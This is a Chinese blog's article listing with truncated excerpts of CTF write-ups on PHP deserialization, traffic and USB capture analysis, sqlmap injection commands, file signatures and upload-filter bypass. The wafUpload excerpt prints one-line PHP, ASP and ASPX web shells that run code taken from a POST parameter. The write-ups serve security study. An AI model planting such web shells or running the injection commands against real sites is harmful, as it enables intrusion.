![](https://img-blog.csdnimg.cn/20201014180756928.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
CTF
诸神之眼
这个作者很懒,什么都没留下…
展开
-
还原HITCON 2016一道web题(php反序列化漏洞)
实验环境搭建:PHPstudy,火狐(backbar),notepad++;原题目代码:https://github.com/orangetw/My-CTF-Web-Challenges/tree/master/hitcon-ctf-2016/babytrick本人在还原此题目时,因为mysql数据库用户名密码和方便调试等原因对源码的一些参数做了一些相应的改动,但是没有改变主要代码。c...原创 2018-07-27 08:54:00 · 3289 阅读 · 1 评论 -
流量分析题目(流量检索,数据提取,数据重组,伪加密,图片提取)
流量检索:将数据包加入科来进行分析,当然wireshark也可以,但是科来的数据可视化做的比较好。找到了一个比较大的数据包,打开看看。。。数据提取:搜索关键字flag。。。果然在这里,使用wireshark进行数据的提取,看大小应该就是这几个了数据重组:挨个保存,最好编个号,以免重组的时候乱了顺序一共保存了五个数据包,以上所选是每个包的包头,需要去掉...原创 2018-10-21 23:42:47 · 5868 阅读 · 0 评论 -
USB键盘流量分析
先使用命令:tshark -r data.pcap -T fields -e usb.capdata将数据提取出来对照下列编码写出脚本,还原数据USB键盘数据包含8个字节BYTE1 -- 特殊按键 |--bit0: Left Control是否按下,按下为1 |--bit1: Left Shift 是否按下,按下为1 |...原创 2018-10-21 19:51:00 · 3329 阅读 · 0 评论 -
常见SQLMAP使用方法详解
一、SQLMAP用于Access数据库注入(1) 猜解是否能注入 win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" Linux : .lmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" (2) 猜解表 win: py...原创 2018-10-25 17:52:43 · 562 阅读 · 0 评论 -
【CTF杂项】常见文件头
文件头文件尾总结JPEG (jpg), 文件头:FFD8FF PNG (png), 文件头:89504E47 文件尾:0000000049454E44AE426082GIF (gif), 文件头:474946...转载 2018-10-16 21:03:33 · 4753 阅读 · 0 评论 -
解护网杯一道web(EasyChallenge)
题目初始只给20元钱,一个大辣条5元,一个辣条之王需要5个大辣条,恰巧不够。。。凑够大辣条:无意快速点击了两此购买,显示购买了两次,由此联想到,购买和钱数更新没有做约束,于是开多线程发包请求凑够了五个大辣条,(最多刷出过18个大辣条)于是开始对辣条之王的输入框进行测试。采用注入,多线程请求均无效。输入一个很大的数字时,提示非法,于是考虑到数据溢出,开始爆破测试临界点...原创 2018-10-13 20:22:40 · 1065 阅读 · 0 评论 -
就南邮攻防平台一道web题(AAencode),论颜文字js解密
根据题目AAencode可以判断出,这是一道颜文字js加密,但是密文不应该是这样的,单击查看-->文字解码-->unicode然后密文变为以下样式:打开控制台,将密文复制下来,在控制台中跑一下,得到flag。...原创 2018-09-25 20:56:57 · 8396 阅读 · 1 评论 -
解网鼎杯一道web题(Calc)
探测:roboot.txt回显:Traceback (most recent call last): File "/usr/local/lib/python2.7/dist-packages/tornado/web.py", line 1520, in _execute result = self.prepare() File "/usr/local/lib/python2....原创 2018-08-23 22:55:40 · 2414 阅读 · 0 评论 -
解网鼎杯一道web题(wafUpload)
思路:burpsuite截取post数据包,上传木马,菜刀连接。截取上传的数据包,对filename参数使用数组绕过,上传php.php,同时得到php.php路径。附:PHP一句话木马:<?php @eval($_POST['key']);?>ASP一句话木马:<%eval request['key']%>ASPX一句话木马:<%@ Page L...原创 2018-08-23 22:48:42 · 1386 阅读 · 0 评论 -
解网鼎杯一道web题(fakebook)
扫描:nikto扫描:发现隐藏的robots.txt,其中有源码泄漏(/user.php.bak),输入到地址栏,得到文件user.php.bak。然后用御剑扫描,发现flag.php。user.php.bak源码:<?phpclass UserInfo{ public $name = ""; public $age = 0; public $...原创 2018-08-23 10:20:18 · 13396 阅读 · 3 评论 -
PHP代码安全【PHP弱口令、加密函数、绕过函数】/CTF代码审计题
1、判等类型1.1、”==”与”===”比较漏洞/switch如果你认为“==”和"==="最大的区别在于,“==”是判断数值是否相等,“===”则是判断数值和类型是否相等,那就错了,这并没有说到最核心的一个关键点,要知道“==”最可怕的一点是,如果类型不同的进行比较,其会将类型转换成相同的再进行比较<?php var_dump("admin" ==0);var_dump("1...转载 2018-10-31 21:56:36 · 1577 阅读 · 0 评论